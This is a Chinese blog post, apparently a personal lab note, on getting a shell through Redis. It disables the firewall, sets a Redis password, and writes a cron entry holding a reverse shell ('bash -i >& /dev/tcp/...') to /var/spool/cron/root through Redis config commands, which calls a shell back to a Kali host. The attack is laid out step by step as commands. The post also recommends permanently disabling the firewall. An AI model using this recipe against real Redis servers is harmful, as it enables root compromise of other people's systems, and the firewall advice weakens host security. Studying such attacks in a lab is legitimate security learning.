记一下redis的报错,顺便利用redis获取下shell

之所以会报这个错的原因是因为防火墙没关,所以把目标机器的防火墙关了就ok了

1:查看防火状态

systemctl status firewalld

service  iptables status

2:暂时关闭防火墙

systemctl stop firewalld

service  iptables stop

3:永久关闭防火墙

systemctl disable firewalld

chkconfig iptables off

4:重启防火墙

systemctl enable firewalld

service iptables restart  

5:永久关闭后重启

//暂时还没有试过

chkconfig iptables on 
 

这里我们直接永久关闭防火墙:systemctl disable firewalld

ok,redis成功连接

执行下get命令,发现报错 

这里报错的是不安全的错误,提示本地回环连接......

直接在redis-conf里面注释掉本地回环连接

这里,我们redis-cli -h 目标ip

连接上去再修改一下密码,因为默认是没有密码的

修改密码命令:config set requirepass 密码

查看: config get requirepass

 我们这里密码修改成功,登录一下试试

auth 123456

ok,登录成功

接下来连shell

set  xx   "\n* * * * * bash -i >& /dev/tcp/10.32.4.232/9999 0>&1\n"        #设置计划任务ip、端口为kali的ip

config set dir /var/spool/cron/                #设置要导出的目录

config set dbfilename root                       #用户名为root

但我kali里面用dir不行,一直报错

目前未解决,所以我直接在centos的/var/spool/cron/目录下创建了个root的文件

里面内容为计划任务

 

 ok,shell弹回来了,写个文件看看

 

 目标靶机上成功写入进去了,但dir的问题还是不知道什么原因,有大佬知道的话,私信一下小弟,感激不尽!

2022-6-11解决问题

报这个错误的话

可以先在靶机上登录127.0.0.1,先设置一个密码,然后再在kali机器上面用密码登录就ok了。

 

最后是因为我用的redis的版本是7.0的,版本问题,最后换了个5.0的版本,成功解决问题

可以参考一下这位师傅的博客,关于5.0的redis计划任务反弹shell_火中的冰~的博客-CSDN博客_redis计划任务反弹shell

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值